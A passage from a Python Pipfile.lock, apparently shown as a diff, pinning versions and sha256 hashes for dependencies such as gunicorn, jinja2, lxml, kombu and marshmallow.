"sha256:94c817e84245513926588caf1152e3b559ff794d505555211ca041f032abbb6b", + "sha256:971ce5e14dc5e73715755d0ca2975ac88cfdaefcaab078a284fea6cfabf866df", + "sha256:9d14b83fab60d5e8abe587d51c75b252bcc21683f24699ada8fb275d7712f5a9", + "sha256:9f35ec95538f50292f6d8f2c9c9f8a3c6540bbfec21c9e5b4b751e0a7c20864f", + "sha256:a1846f1b999e78e13837c93c778dcfc3365902cfb8d1bdb7dd73ead37059f0d0", + "sha256:acd2162a36d3de67ee896c43effcd5ee3de247eb00354db411feb025aa319857", + "sha256:b0ef99cdbe2b682b9ccbb964743a6aca37905fda5e0452e5ee239b1654d37f2a", + "sha256:b80f600eddddce72320dbbc8e3784d16bd3fb7b517e82476d8da921f27d4b249", + "sha256:b864ba53912b6c3ab6bcb2beb19f19edd01a6bfcbdfe1f37ddd1778abfe75a30", + "sha256:b9ec052b06a0524f0e35bd8790686a1da006bd911dd1ef7d50b77bfbad74e292", + "sha256:ba2956617f1c42598a308a84c6cf021a90ff3862eddafd20c3333d50f0edb45b", + "sha256:bdfea8c661e80d3c1c99ad7c3ff74e6e87184895bbaca6ee8cc61209f8b9b85d", + "sha256:be4ed120b52ae4d974aa40215fcdfde9194d63541c7ded40ee12eb4dda57b76b", + "sha256:c4302695ad8027363e96311df24ee28978162cdcdd2006476c43970b384a244c", + "sha256:c48f54ef8e05f04d6eff74b8233f6063cb1ed960243eacc474ee73a2ea8573ca", + "sha256:c9c59a2120b55788e800d82dfa99b9e156ff8f2227f07c5e3012a45a399620b7", + "sha256:cd021c754b162c0fb55ad5d6b9d960db667faad0fa2ff25bb6e1301b0b6e6a75", + "sha256:d27ec7509b9c18b6d73f2f5ede2622441de812e7b1a80bbd446cb0633bd3d5ae", + "sha256:d5508f0b173e6aa47273bdc0a0b5ba055b59662ba7c7ee5119528f466585526b", + "sha256:d75209eed723105f9596807495d58d10b3470fa6732dd6756595e89925ce2470", + "sha256:db1a39669102a1d8d12b57de2bb7e2ec9066a6f2b3da35ae511ff93b01b5d564", + "sha256:dbfcfc0218093a19c252ca8eb9aee3d29cfdcb586df21049b9d777fd32c14fd9", + "sha256:e0f72c9ddb8cd28532185f54cc1453f2c16fb417a08b53a855c4e6a418edd099", + "sha256:e7c8dc13af7db097bed64a051d2dd49e9f0af495c26995c00a9ee842690d34c0", + "sha256:ea9872c80c132f4663822dd2a08d404073a5a9b5ba6155bea72fb2a79d1093b5", + "sha256:eff4eb9b7eb3e4d0cae3d28c283dc16d9bed6b193c2e1ace3ed86ce48ea8df19", + "sha256:f82d4d717d8ef19188687aa32b8363e96062911e63ba22a0cff7802a8e58e5f1", + "sha256:fc3a569657468b6f3fb60587e48356fe512c1754ca05a564f11366ac9e306526" + ], + "markers": "platform_python_implementation == 'CPython'", + "version": "==2.0.2" + }, + "gunicorn": { + "hashes": [ + "sha256:9dcc4547dbb1cb284accfb15ab5667a0e5d1881cc443e0677b4882a4067a807e", + "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8" + ], + "index": "pypi", + "version": "==20.1.0" + }, + "humanize": { + "hashes": [ + "sha256:8bc9e2bb9315e61ec06bf690151ae35aeb65651ab091266941edf97c90836404", + "sha256:9783373bf1eec713a770ecaa7c2d7a7902c98398009dfa3d8a2df91eec9311e8" + ], + "markers": "python_version >= '3.8'", + "version": "==4.8.0" + }, + "id-validator": { + "hashes": [ + "sha256:90b73b89f807f8b387beaa7f1f86baa4a64fa5674df5db9ab1a7362433f8e3b8" + ], + "index": "pypi", + "version": "==1.0.20" + }, + "idna": { + "hashes": [ + "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", + "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" + ], + "index": "pypi", + "version": "==2.10" + }, + "inflection": { + "hashes": [ + "sha256:1a29730d366e996aaacffb2f1f1cb9593dc38e2ddd30c91250c6dde09ea9b417", + "sha256:f38b2b640938a4f35ade69ac3d053042959b62a0f1076a5bbaa1b9526605a8a2" + ], + "markers": "python_version >= '3.5'", + "version": "==0.5.1" + }, + "jinja2": { + "hashes": [ + "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852", + "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61" + ], + "markers": "python_version >= '3.7'", + "version": "==3.1.2" + }, + "jmespath": { + "hashes": [ + "sha256:b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9", + "sha256:cdf6525904cc597730141d61b36f2e4b8ecc257c420fa2f4549bac2c2d0cb72f" + ], + "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==0.10.0" + }, + "jq": { + "hashes": [ + "sha256:0015b80570b38176f5ac22049b957d4f34ee8030f6ee89955f95bce4bfff8451", + "sha256:028604640ba281c2bc5fa1b4284078d4d56d9431c96b6f71715fd801a3d2cdfb", + "sha256:05d44bdf6a97ad4866ad099fed5297214a58e1e3e56657be41495c69ce74aa11", + "sha256:06d02868ec10cf1e744fda3ec1b6928eb2a05fbbb3b52383c85285d52e8e000a", + "sha256:0d8c8a0e7bc6f738e482472b4fbb6be97eab707924661782e90c378327688b29", + "sha256:0dc8ca9e2ea1afc8e856e92eee70f6ab728342d1c071c741b2047d5c08961d8a", + "sha256:118070043a369378feadf22f091e57b4054b3325ccdc248e1f19c8586bfe9e6f", + "sha256:11d6e7c98efcb38b95481687310ed0ec7f230cc8916ac1c054827552f45ece5d", + "sha256:150aeaa02d57fc9c4966c7af8c6c2a9c6736f82a798c7bc72b44dd7970f1f8d8", + "sha256:1569aa11654a686be9323c9c4329d4a961dd96f9f0b9800eb3bdd939b017cb8a", + "sha256:16e28f6964b827a5170a0d7f086367601ef1d420952de81934e79cff638a6bc8", + "sha256:18bb7c70fc01f5e4739b1ac3cbab958eae881b1991615c973b9cdcfcd06ce93f", + "sha256:228c42e825007277fd01ad71f6ea93bda289fe45693b2d3649eeb87b75a6b083", + "sha256:28c6ec10c97e697ca73d1fe188c340d53ad17fc4b42fcca87570c060f9364c55", + "sha256:3c7b8f71778fb4140e923bb716caef0709e6f64d33ea369236f1d43c76d62f7a", + "sha256:4b46fe1f91423699337c5f3b1001943b911bb54a9e045a1b8d6493142f4acc45", + "sha256:4bc0680f7b4cff6a9077a288e6e166a327eb916a50041cf10d9d3df289b1e5d1", + "sha256:4edd3edde1bec54408dc14a4ab4350523e2d69c15cac58033459cff3ff814ca9", + "sha256:52cce695dafc461becee6d14889918db7cccafd6f3c28e9174042caa7e017e96", + "sha256:52ffba73a294949dfddef52a70672e3d5bc694f9e593d3cbcc115449c735e26c", + "sha256:56ea972fd697aea1658c56bd18da9d2ae2494ae9be627858a5152d70cdea75f2", + "sha256:5952b363fd44e4c2e1ceb8a88c0205699ee4eb060c34e1b590f39f3490533549", + "sha256:5ae2b94979bcd6a183aa18056bce975d5081199d83cbf914ff71aecab4e0a2d4", + "sha256:5c4e9d9cdf5e63bddeea01d1150903dcb45c3fbd028ecf4578561b0b6dddb8dc", + "sha256:673ec567be3644166a367627e8393944ce2d21b2e14dc1f4be48b2e3082ccfc2", + "sha256:6b07ad65aa9fca72b7e722585bac5a5e13280257abe9e9d5af845a003e66ff8b", + "sha256:6c427bb8f782eb4ac0326b9f65d5f002bd9a5947d9bc715e662cda659361c48c", + "sha256:71d5725dae1dd2f636fb696865a10f260610a23ea029ca7b78f2b7c033b3b148", + "sha256:75fd74d74e0f78f513fd8517d39fee591b6dc194b422e5b2d88b77899a79a2a9", + "sha256:78d13cbeb6dd512adcf2bbebf393c18e3c0b7e3e366ce7a05b46310ce2924a65", + "sha256:7b1ad8a91623fa3c5cecff9dc398eebf7e5e82ba9982f60e5ef17172d78a4ecc", + "sha256:7c09caae5a24a3216a1bb812489e1ad6bc0e2b7410853c930c272a4ab65c8667", + "sha256:8d263927eb8140c174e715da2ad8c009e65e7d3fa82b8af176744b9367aae860", + "sha256:95160aa31efde7939763c80767e85d9a34544ab87e7ed66ee13f42dbc4595d37", + "sha256:96b66f41a91c9794f8051cc32d8fd3206c6409693f0076b22eacb4faa0bc504f", + "sha256:96da9428a158fa377ec1f432e4790ce3e0640e28004aa1cb6486db374277c6a1", + "sha256:980ac3ad4fa9e61bbec4e17d0d01c7bad11decca49620d9766aff047a4043eb9", + "sha256:b3352b273e17e530de5cfbf55cdba68d6231cdf0ac10ca6baf438e41fd43e881", + "sha256:ba4afcb00c1fc8d1f0d79f0029345f91e207909fd2c125aeedbf7b4cf2c1fc84", + "sha256:bb72811aa78cf0f82d512731c47e69611168909b991b43481d2a6dc0da940835", + "sha256:bbf73f553e23f99c33463041dc04de3b5a5eefdfc35bd9e2e33ba4f7b060249e", + "sha256:d49afd3743d9703d31ed2148d9c5d8edc7bf1c894688f4c72b0d9ef5e0add7b3", + "sha256:dab5daca625ba4c10c3579d55fe057b063ad609f0c0382ae6e28936d7ec8a772", + "sha256:e874298835c55e60bbf27bc21799ec64bc1305a0b1dcc4646f2755210fe43bfa", + "sha256:e97578a5e53b06481dbdf5b88e38e6dd856b53ba7bd68678ceadb50de3799fd1", + "sha256:e97850b803ea8604cd14645a63ad5863d86fdbfaf0bede0da0490c3108956bd0", + "sha256:ead1c073cf33326be15a879475e3dd8b5f5a70ccff95acafbba56ea3d231803d", + "sha256:eb28afd2e43e1ece66618381b646ff1da65fc129f0d9cc600ec224f384add061", + "sha256:ec2255c7fe76070a8ee52cc3d32a7cd7f84fca9a6048873c01b07ca1c70db295", + "sha256:ee0503d45e8b24dd4757460e7664c275aed9a6e5f4986b16a483dc11fb83c19b", + "sha256:f36e1d4837383489b0e0c2c70da06c2cb6332bca4fa864b0c7a1500abfed384a", + "sha256:fa0a8032416746edb57ea570cafc99026c2c240d8a0624c0a43631fc82cc0efa", + "sha256:fa7724caaedf6c48522a6805e4306978defc5f0d6bd6ab0d25eeb7207dae9a90", + "sha256:fd04032736f7b94d1e0720634038cc58980f5eeac7e280bbf5f70e03c7f1afd9", + "sha256:fe9fb7748e39b30b5723a7f6695e2f6c58707563b94f1239766d2c8b9550f147" + ], + "index": "pypi", + "version": "==1.3.0" + }, + "jsonlog": { + "hashes": [ + "sha256:d8964ac2f561b821a3ca21cd39849cfbe6da9fd038480e073434f51c65d38971", + "sha256:ee313731f2a8611a13e0c15cfcfbab75c524f27c8bae24eaeb7ee7a061a60c55" + ], + "index": "pypi", + "version": "==4.0.0" + }, + "jsonschema": { + "hashes": [ + "sha256:5bfcf2bca16a087ade17e02b282d34af7ccd749ef76241e7f9bd7c0cb8a9424d", + "sha256:f660066c3966db7d6daeaea8a75e0b68237a48e51cf49882087757bb59916248" + ], + "index": "pypi", + "version": "==4.17.0" + }, + "kombu": { + "hashes": [ + "sha256:48ee589e8833126fd01ceaa08f8a2041334e9f5894e5763c8486a550454551e9", + "sha256:fbd7572d92c0bf71c112a6b45163153dea5a7b6a701ec16b568c27d0fd2370f2" + ], + "markers": "python_version >= '3.8'", + "version": "==5.3.1" + }, + "lxml": { + "hashes": [ + "sha256:04da965dfebb5dac2619cb90fcf93efdb35b3c6994fea58a157a834f2f94b318", + "sha256:0538747a9d7827ce3e16a8fdd201a99e661c7dee3c96c885d8ecba3c35d1032c", + "sha256:0645e934e940107e2fdbe7c5b6fb8ec6232444260752598bc4d09511bd056c0b", + "sha256:079b68f197c796e42aa80b1f739f058dcee796dc725cc9a1be0cdb08fc45b000", + "sha256:0f3f0059891d3254c7b5fb935330d6db38d6519ecd238ca4fce93c234b4a0f73", + "sha256:10d2017f9150248563bb579cd0d07c61c58da85c922b780060dcc9a3aa9f432d", + "sha256:1355755b62c28950f9ce123c7a41460ed9743c699905cbe664a5bcc5c9c7c7fb", + "sha256:13c90064b224e10c14dcdf8086688d3f0e612db53766e7478d7754703295c7c8", + "sha256:1423631e3d51008871299525b541413c9b6c6423593e89f9c4cfbe8460afc0a2", + "sha256:1436cf0063bba7888e43f1ba8d58824f085410ea2025befe81150aceb123e345", + "sha256:1a7c59c6ffd6ef5db362b798f350e24ab2cfa5700d53ac6681918f314a4d3b94", + "sha256:1e1cf47774373777936c5aabad489fef7b1c087dcd1f426b621fda9dcc12994e", + "sha256:206a51077773c6c5d2ce1991327cda719063a47adc02bd703c56a662cdb6c58b", + "sha256:21fb3d24ab430fc538a96e9fbb9b150029914805d551deeac7d7822f64631dfc", + "sha256:27e590352c76156f50f538dbcebd1925317a0f70540f7dc8c97d2931c595783a", + "sha256:287605bede6bd36e930577c5925fcea17cb30453d96a7b4c63c14a257118dbb9", + "sha256:2aaf6a0a6465d39b5ca69688fce82d20088c1838534982996ec46633dc7ad6cc", + "sha256:32a73c53783becdb7eaf75a2a1525ea8e49379fb7248c3eeefb9412123536387", + "sha256:41fb58868b816c202e8881fd0f179a4644ce6e7cbbb248ef0283a34b73ec73bb", + "sha256:4780677767dd52b99f0af1f123bc2c22873d30b474aa0e2fc3fe5e02217687c7", + "sha256:4878e667ebabe9b65e785ac8da4d48886fe81193a84bbe49f12acff8f7a383a4", + "sha256:487c8e61d7acc50b8be82bda8c8d21d20e133c3cbf41bd8ad7eb1aaeb3f07c97", + "sha256:4beea0f31491bc086991b97517b9683e5cfb369205dac0148ef685ac12a20a67", + "sha256:4cfbe42c686f33944e12f45a27d25a492cc0e43e1dc1da5d6a87cbcaf2e95627", + "sha256:4d5bae0a37af799207140652a700f21a85946f107a199bcb06720b13a4f1f0b7", + "sha256:4e285b5f2bf321fc0857b491b5028c5f276ec0c873b985d58d7748ece1d770dd", + "sha256:57e4d637258703d14171b54203fd6822fda218c6c2658a7d30816b10995f29f3", + "sha256:5974895115737a74a00b321e339b9c3f45c20275d226398ae79ac008d908bff7", + "sha256:5ef87fca280fb15342726bd5f980f6faf8b84a5287fcc2d4962ea8af88b35130", + "sha256:603a464c2e67d8a546ddaa206d98e3246e5db05594b97db844c2f0a1af37cf5b", + "sha256:6653071f4f9bac46fbc30f3c7838b0e9063ee335908c5d61fb7a4a86c8fd2036", + "sha256:6ca2264f341dd81e41f3fffecec6e446aa2121e0b8d026fb5130e02de1402785", + "sha256:6d279033bf614953c3fc4a0aa9ac33a21e8044ca72d4fa8b9273fe75359d5cca", + "sha256:6d949f53ad4fc7cf02c44d6678e7ff05ec5f5552b235b9e136bd52e9bf730b91", + "sha256:6daa662aba22ef3258934105be2dd9afa5bb45748f4f702a3b39a5bf53a1f4dc", + "sha256:6eafc048ea3f1b3c136c71a86db393be36b5b3d9c87b1c25204e7d397cee9536", + "sha256:830c88747dce8a3e7525defa68afd742b4580df6aa2fdd6f0855481e3994d391", + "sha256:86e92728ef3fc842c50a5cb1d5ba2bc66db7da08a7af53fb3da79e202d1b2cd3", + "sha256:8caf4d16b31961e964c62194ea3e26a0e9561cdf72eecb1781458b67ec83423d", + "sha256:8d1a92d8e90b286d491e5626af53afef2ba04da33e82e30744795c71880eaa21", + "sha256:8f0a4d179c9a941eb80c3a63cdb495e539e064f8054230844dcf2fcb812b71d3", + "sha256:9232b09f5efee6a495a99ae6824881940d6447debe272ea400c02e3b68aad85d", + "sha256:927a9dd016d6033bc12e0bf5dee1dde140235fc8d0d51099353c76081c03dc29", + "sha256:93e414e3206779ef41e5ff2448067213febf260ba747fc65389a3ddaa3fb8715", + "sha256:98cafc618614d72b02185ac583c6f7796202062c41d2eeecdf07820bad3295ed", + "sha256:9c3a88d20e4fe4a2a4a84bf439a5ac9c9aba400b85244c63a1ab7088f85d9d25", + "sha256:9f36de4cd0c262dd9927886cc2305aa3f2210db437aa4fed3fb4940b8bf4592c", + "sha256:a60f90bba4c37962cbf210f0188ecca87daafdf60271f4c6948606e4dabf8785", + "sha256:a614e4afed58c14254e67862456d212c4dcceebab2eaa44d627c2ca04bf86837", + "sha256:ae06c1e4bc60ee076292e582a7512f304abdf6c70db59b56745cca1684f875a4", + "sha256:b122a188cd292c4d2fcd78d04f863b789ef43aa129b233d7c9004de08693728b", + "sha256:b570da8cd0012f4af9fa76a5635cd31f707473e65a5a335b186069d5c7121ff2", + "sha256:bcaa1c495ce623966d9fc8a187da80082334236a2a1c7e141763ffaf7a405067", + "sha256:bd34f6d1810d9354dc7e35158aa6cc33456be7706df4420819af6ed966e85448", + "sha256:be9eb06489bc975c38706902cbc6888f39e946b81383abc2838d186f0e8b6a9d", + "sha256:c4b2e0559b68455c085fb0f6178e9752c4be3bba104d6e881eb5573b399d1eb2", + "sha256:c62e8dd9754b7debda0c5ba59d34509c4688f853588d75b53c3791983faa96fc", + "sha256:c852b1530083a620cb0de5f3cd6826f19862bafeaf77586f1aef326e49d95f0c", + "sha256:d9fc0bf3ff86c17348dfc5d322f627d78273eba545db865c3cd14b3f19e57fa5", + "sha256:dad7b164905d3e534883281c050180afcf1e230c3d4a54e8038aa5cfcf312b84", + "sha256:e5f66bdf0976ec667fc4594d2812a00b07ed14d1b44259d19a41ae3fff99f2b8", + "sha256:e8f0c9d65da595cfe91713bc1222af9ecabd37971762cb830dea2fc3b3bb2acf", + "sha256:edffbe3c510d8f4bf8640e02ca019e48a9b72357318383ca60e3330c23aaffc7", + "sha256:eea5d6443b093e1545ad0210e6cf27f920482bfcf5c77cdc8596aec73523bb7e", + "sha256:ef72013e20dd5ba86a8ae1aed7f56f31d3374189aa8b433e7b12ad182c0d2dfb", + "sha256:f05251bbc2145349b8d0b77c0d4e5f3b228418807b1ee27cefb11f69ed3d233b", + "sha256:f1be258c4d3dc609e654a1dc59d37b17d7fef05df912c01fc2e15eb43a9735f3", + "sha256:f9ced82717c7ec65a67667bb05865ffe38af0e835cdd78728f1209c8fffe0cad", + "sha256:fe17d10b97fdf58155f858606bddb4e037b805a60ae023c009f760d8361a4eb8", + "sha256:fe749b052bb7233fe5d072fcb549221a8cb1a16725c47c37e42b0b9cb3ff2c3f" + ], + "index": "pypi", + "version": "==4.9.1" + }, + "marisa-trie": { + "hashes": [ + "sha256:00a8f62a6b371ec0a947f49cd960a9dee3ac43eb0c8cce7a4b2736bc20cb6c3d", + "sha256:0ac90d35eec78368f8ec42c45ab9f6ab0ccbd30ddf5e63f801cc62f03839b16b", + "sha256:0e00da36b5297f644e65764252496f3b3aa7f95a7cb53e19ee2354054b759dbb", + "sha256:14536de51294752ef490a470240b83677486a42eb5e3bc97d0bfca4c20b2babb", + "sha256:1a5a51f7d4d8b4e603d5fed992a1e8ab5212291bb20d25d0020b90cb4562da53", + "sha256:1b704487470c9e1f08e31572633e11d25ada0628ec3ebfd28b110aeb62cc2233", + "sha256:2ad8eb6f48167291eb81b95f25f80b9ea02d168951e4df17499fc3c34e9c3f36", + "sha256:31661a8d2094eeb8341cb660b53c33e4828032582dce3895db09567e48de2c52", + "sha256:3421c117b66275b91f6fa07f732a788cce0e2bfa00d312d83516b0155cf72462", + "sha256:346cd9b0bf40385f8aee008d8c4962206962184673aea1631ee51b081c676250", + "sha256:35d0af53db6961c65d655248399cec893071eb5ae2cf06e6571f2fbea038a6d1", + "sha256:3bb9fbf2d10696fc4706984ebbd1bbb09724ab9f16758ec4ce344bbf50326302", + "sha256:3d019d17b0d7f62d6e6d7bd05236d8252624ea1c140beb8bf9c6eeff38b3c707", + "sha256:3fb5fa90aa5fdffa6b9f1ea33d54d683682b53277642cef27bbc2e9ecc9a1c9f", + "sha256:4dfea1c84d8862368b7bda2480b28f0bb465dae7efd9a7ca94b2dfce62648028", + "sha256:571ead866d0b9a70eb016a0b0b5a8c9ec357a92447b63fdd30a497cea4a1945a", + "sha256:5f97883f89e649b47ad22f6ca55a5931986c103a4c52e121101db28cebb9e5f7", + "sha256:615a33ed4f28d6734a71d9fbae836420cfd2e64d5e0d948f00fb7d4c5fe1aed0", + "sha256:68451447d201b8951efa141ca038b5cd2bebd7ad875dba3e5b325ec19f9b04ea", + "sha256:6c13fbd44c9e40eaa380845a9baa64a1fd123bc0de8cbd6e13e8fc11675c3f79", + "sha256:6cf376b51d7a199450d075883d516dc4d134aec6f62ae3afdf224c4c10131464", + "sha256:713644ac3e7ef17adee5eeeb30fcd1bf86de14aa319fe1fe8e7dfad2505dc38a", + "sha256:75889b3dbe544f02d8e55ef4355f39df63643f83fc239ab5651c0356a2b82cc1", + "sha256:77537883f3b73a4d8e3c2d3af04360516af7c4b96271de5d45532eb86fef9356", + "sha256:852d062c863ddc0795196bd30ebb9945b462febc782f12e3316429a58182bfe3", + "sha256:87f2158bd88539a1ce99246aff4a544e0bf244637ff6d5e780befc7fb97c6e29", + "sha256:8e4ef47d20fe2a3b4c36c4ec88334d4661cadef4cda785de2386c4a1a9be9e0d", + "sha256:936878a6c14551c83d17fac6cc7c8fa0a41745f96dd75d3fbc0a90859bbbb2f6", + "sha256:93af5a92405be7f56a226ba6169e32e56c31f6ea58270fa7156ae99adc314ae8", + "sha256:96aef02119b70f37c59a289cb0f7293547780dfe60ba302140f6083518cec9b9", + "sha256:990929e8ba36b650d95d600113896b57525b33000a13dc2be06018abb005b47e", + "sha256:99c2b536641dfb44d790eb4349e08ceb61e8c2876e376bc063013e5ecbb39619", + "sha256:9e80a28bc6de8e6ba3449df55ff3c42ca9fd511ec829dd7774a0f1320f4a888b", + "sha256:9f8d25da9a93ebab0d72eaecf8683fe916e08b8029979d3c3fd9aca60da426a8", + "sha256:9fc453083768b666098f200ad2761d0b17b79c8de2d405748db342cb0529408d", + "sha256:a708cbae3b502fdcb39cc25f2e5079026de1a4814c234c34d13e216967951b28", + "sha256:a74751c141f42b14a430d82f46e1523f73b1b73d7d90de6b0f0a7e22dd75976d", + "sha256:aa63bcf05c3f4dfc0312b3c0c0ea84aed47d59ef4d99b3eeaa718ff938a75cbd", + "sha256:b11adc952efb0ba3d23f3cb98aec58b369f308f48de12f7bb207ca288e304c1d", + "sha256:b804e25a36823a806ae3072214acea389bfa46cd46dc176450fb073f5f2c688b", + "sha256:b9db0b0a659d80b2c2b19601984c093dafa484698311d96a2da34b4cbe887ec1", + "sha256:bb91907fb1c5450819f9e844a1a5f1f81e27fc502e41ba7836842f4b56d04e04", + "sha256:bdcffb4d5707ba02824989de120eac137c49639e67254e5d68d8a874e1153922", + "sha256:cb5efa71bba63edbe5207394eb1652cf5b51018a40fd327614246078f5dec48a", + "sha256:cd14bb68d35c1aeb9923bc38040597883f11e79418a7ddeee6c3a54a53f5476d", + "sha256:d2c20cb7ddf3c145bac0c7bf5c1bcf006054b7604a81487113971b44622cad5c", + "sha256:d305c7ffc912a806fcfcae70afd8dd3c6f915b453a611b70e0e768a8a793d296", + "sha256:d434f4ebd69061f975b7d4f0af9951fccd9c91997bef4e7e9c77720e26f93f56", + "sha256:d4dbb091121e3bd48d8353c8a7885332907a5526286829c7db948da665fafcf9", + "sha256:dc6549c1a7bf743b3da992e2527a71a3251097cf451733c6d3038b03a96f6dcc", + "sha256:dea191db66c122db0660ae127ea6c8f4462886ad9b7525757097a87ee941c4ae", + "sha256:e54ae0a9e7c4623252e3e4bede110a250ad017dc491303e9aa00e10c7a7c14cc", + "sha256:e6486c924a6e2bb58d2b6320932ae7d3b59b54e39b40b16fb41875c20eeb13fe", + "sha256:e6db758035d119172dd9f6315c8038124d2c15e96bd1698b999cd2d5f020b7ce", + "sha256:e7e7ca4338075275a0bd34f99a979dfbdafab4aefe212a9d1e6c3790e56d7c0a", + "sha256:eae0ce778d781c952e6c954b62719fde3251560232151c322d7f06b129d0a7fd", + "sha256:ed65ffd42a28db0f4bae8618e2eac32ccd00068d39abecd7cf4ffc8dc6488295", + "sha256:ef9c087471141a6f10f903355e7b0fa6d98e097c02453241d9949892b47e5cac", + "sha256:f157abd020dfbdd32ab3aa7bda3a6f65b3007f2e3f793313bebd0d6114a39647", + "sha256:f15bde9dc8e1dc7168f696fc49ab3e02c9aa16dde1d9798edf4a942fab1a3009", + "sha256:f25db06c59b66cef1b6d777438096b43acfc463ed9741318f7befd98a22801cd", + "sha256:f80589720dac6a9191a9025c3ecbf271445d0f5c2b78ba881573f0e9ebf48003", + "sha256:fb76cbb76a10231b6e7366a31a7eecfc742d32f8988ded0b5ae8b325c49ef103" + ], + "index": "pypi", + "version": "==0.8.0" + }, + "markuppy": { + "hashes": [ + "sha256:1adee2c0a542af378fe84548ff6f6b0168f3cb7f426b46961038a2bcfaad0d5f" + ], + "version": "==1.14" + }, + "markupsafe": { + "hashes": [ + "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e", + "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e", + "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431", + "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686", + "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559", + "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc", + "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c", + "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0", + "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4", + "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9", + "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575", + "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba", + "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d", + "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3", + "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00", + "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155", + "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac", + "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52", + "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f", + "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8", + "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b", + "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24", + "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea", + "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198", + "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0", + "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee", + "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be", + "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2", + "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707", + "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6", + "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58", + "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779", + "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636", + "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c", + "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad", + "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee", + "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc", + "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2", + "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48", + "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7", + "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e", + "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b", + "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa", + "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5", + "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e", + "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb", + "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9", + "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57", + "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc", + "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2" + ], + "markers": "python_version >= '3.7'", + "version": "==2.1.3" + }, + "marshmallow": { + "hashes": [ + "sha256:5d2371bbe42000f2b3fb5eaa065224df7d8f8597bc19a1bbfa5bfe7fba8da889", + "sha256:684939db93e80ad3561392f47be0230743131560a41c5110684c16e21ade0a5c" + ], + "markers": "python_version >= '3.8'", + "version": "==3.20.1" + }, + "mock": { + "hashes": [ + "sha256:18c694e5ae8a208cdb3d2c20a993ca1a7b0efa258c247a1e565150f477f83744", + 